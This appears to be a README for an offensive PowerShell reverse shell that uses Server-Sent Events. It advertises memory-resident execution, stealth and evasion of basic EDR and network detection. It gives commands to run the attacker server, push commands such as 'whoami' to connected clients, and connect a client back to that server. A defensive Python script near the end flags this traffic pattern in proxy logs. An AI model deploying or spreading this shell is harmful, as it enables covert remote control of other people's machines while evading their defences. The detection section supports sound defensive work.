This project demonstrates a stealthy reverse shell built using native PowerShell and Server-Sent Events (SSE) — a simple HTTP-based protocol that pushes messages from server to client over a single persistent connection.
Unlike traditional reverse shells that rely on polling, sockets, or external binaries, this one uses only:
- Native PowerShell
- A single GET request
- text/event-stream over HTTP
- Memory-resident execution with minimal noise
The SSE server:
- Listens on a specified port using raw TCP
- Pushes commands to clients via SSE
- Receives command output via HTTP POST (/post endpoint)
- Optional interactive terminal or headless mode
The SSE client:
- Connects to the server’s /sse endpoint
- Receives commands via SSE stream
- Executes them locally and posts results back
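Server usage (interactive, then headless):
```powershell
. .\Start-SseServer.ps1
Start-SseServer -Port 8080
Start-SseServer -Port 8080 -Headless
```
Send a command through the server's /command endpoint:
```powershell
(iwr http://<SSE_Server_IP_Address>:8080/command -Method POST -Body "whoami" -ContentType "text/plain" -UseBasicParsing).Content
```
Client usage:
```powershell
. .\Start-SseClient.ps1
Start-SseClient -Uri "http://<server-ip>:8080"
```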
Features:
- Fully memory-resident execution
- No need for raw sockets or polling loops
- Can bypass basic EDR/network detections
- Minimalist, stealthy, and flexible
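For defenders, the traffic shape described above (one GET answered with text/event-stream, followed by POSTs from the same client to the same server) can be hunted in proxy or HTTP logs. The following is an added example, not part of this project's code; the CSV column names, the function names and the sample rows are constructed assumptions, and legitimate SSE applications can match the same shape, so hits are triage leads.

```python
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed proxy-log sample (not real traffic); column names are assumptions.
SAMPLE_LOG = """\
ts,client,method,host,path,resp_content_type
1000,10.0.0.5,GET,203.0.113.10:8080,/sse,text/event-stream
1012,10.0.0.5,POST,203.0.113.10:8080,/post,text/plain
1040,10.0.0.5,POST,203.0.113.10:8080,/post,text/plain
1005,10.0.0.7,GET,intranet.example,/index.html,text/html
1006,10.0.0.7,POST,intranet.example,/login,text/html
1100,10.0.0.9,GET,dash.example,/events,text/event-stream; charset=utf-8
"""

def is_ip_literal(host):
    """True when the host part (port stripped, IPv4 or name assumed) is a bare IP."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False

def find_sse_command_channels(log_text, min_posts=2):
    """Return (client, host, posts, ip_literal) for client/host pairs where an
    SSE stream was opened and the client later POSTed to the same host."""
    stream_opened = set()            # (client, host) pairs with an SSE response
    posts_after = defaultdict(int)   # POSTs seen after the stream was opened
    rows = sorted(csv.DictReader(io.StringIO(log_text)), key=lambda r: int(r["ts"]))
    for r in rows:
        key = (r["client"], r["host"])
        # Ignore parameters such as "; charset=utf-8" when matching the media type.
        ctype = r["resp_content_type"].split(";")[0].strip().lower()
        if r["method"] == "GET" and ctype == "text/event-stream":
            stream_opened.add(key)
        elif r["method"] == "POST" and key in stream_opened:
            posts_after[key] += 1
    return sorted((c, h, n, is_ip_literal(h))
                  for (c, h), n in posts_after.items() if n >= min_posts)

if __name__ == "__main__":
    for hit in find_sse_command_channels(SAMPLE_LOG):
        print(hit)
```

The `ip_literal` flag is only a prioritization hint: a stream served from a bare IP address deserves a closer look than one from a known application hostname.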
This tool is for educational and research purposes only. Do not use this on networks or systems you do not own or have explicit permission to test.
MIT License
Author: TNCX-byte